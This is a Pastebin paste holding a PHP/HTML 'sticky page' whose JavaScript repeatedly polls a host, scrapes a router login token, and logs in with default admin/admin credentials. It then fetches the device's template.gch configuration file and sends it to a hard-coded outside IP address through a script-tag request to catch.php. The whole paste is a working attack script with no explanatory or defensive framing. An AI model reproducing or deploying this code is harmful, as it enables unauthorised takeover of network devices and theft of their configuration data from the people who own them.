Guest User

dddddddddddd

a guest
May 26th, 2019
208
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. // cache this page for a long time
  3. header("Cache-Control: max-age=2592000");
  4. header('Expires: '.gmdate('D, d M Y H:i:s \G\M\T', time() + 365*24*60*60));
  5. ?>
  6. <html>
  7. <head>
  8. </head>
  9. <body>
  10. <h1>This is a sticky page...</h1>
  11. <script>
  12. var pattern = /getObj\("Frm_Logintoken"\).value = "(.*)";/g
  13. var timer = setInterval(function(){info();} ,5000);
  14.  
  15. function info()
  16. {
  17.  
  18. xhr=new XMLHttpRequest();
  19.  
  20. xhr.open("GET", "http://ligeti.com/", false);
  21. xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  22. xhr.send();
  23.  
  24. var result = pattern.exec(xhr.responseText);
  25. //alert (xhr.responseText);
  26.  
  27. if(result != null)
  28. {
  29. if (result.length > 1)
  30. {
  31. var login = new XMLHttpRequest();
  32. var param = "frashnum=&action=login&Frm_Logintoken="+result[1]+"&Username=admin&Password=admin";
  33. //console.log(result[1]);
  34. login.open("POST", "http://ligeti.com/", false);
  35. login.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  36. login.send(param);
  37. //console.log(login.responseText);
  38. clearInterval(timer);
  39. var template = new XMLHttpRequest();
  40. template.open("GET", "http://ligeti.com/template.gch", false);
  41. template.send();
  42. //console.log(template.responseText);
  43. alert("Hacked");
  44. sendResults(template.responseText);
  45. }
  46. }
  47. }
  48. function sendResults(data)
  49. {
  50. alert("Sending Data");
  51. myCallback= function(data){console.log(data)}
  52. script = document.createElement('script');
  53. script.type = 'text/javascript';
  54. //myData = data.replace(/&/g, "&amp;").replace(/>/g, "&gt;").replace(/</g, "&lt;").replace(/"/g, "&quot;");
  55. console.log(data);
  56. script.src = encodeURI('http://92.253.72.62/catch.php?secret=' + data + '&callback=myCallback');
  57. document.head.appendChild(script);
  58. }
  59. info();
  60. </script>
  61. </body>
  62. </html>
RAW Paste Data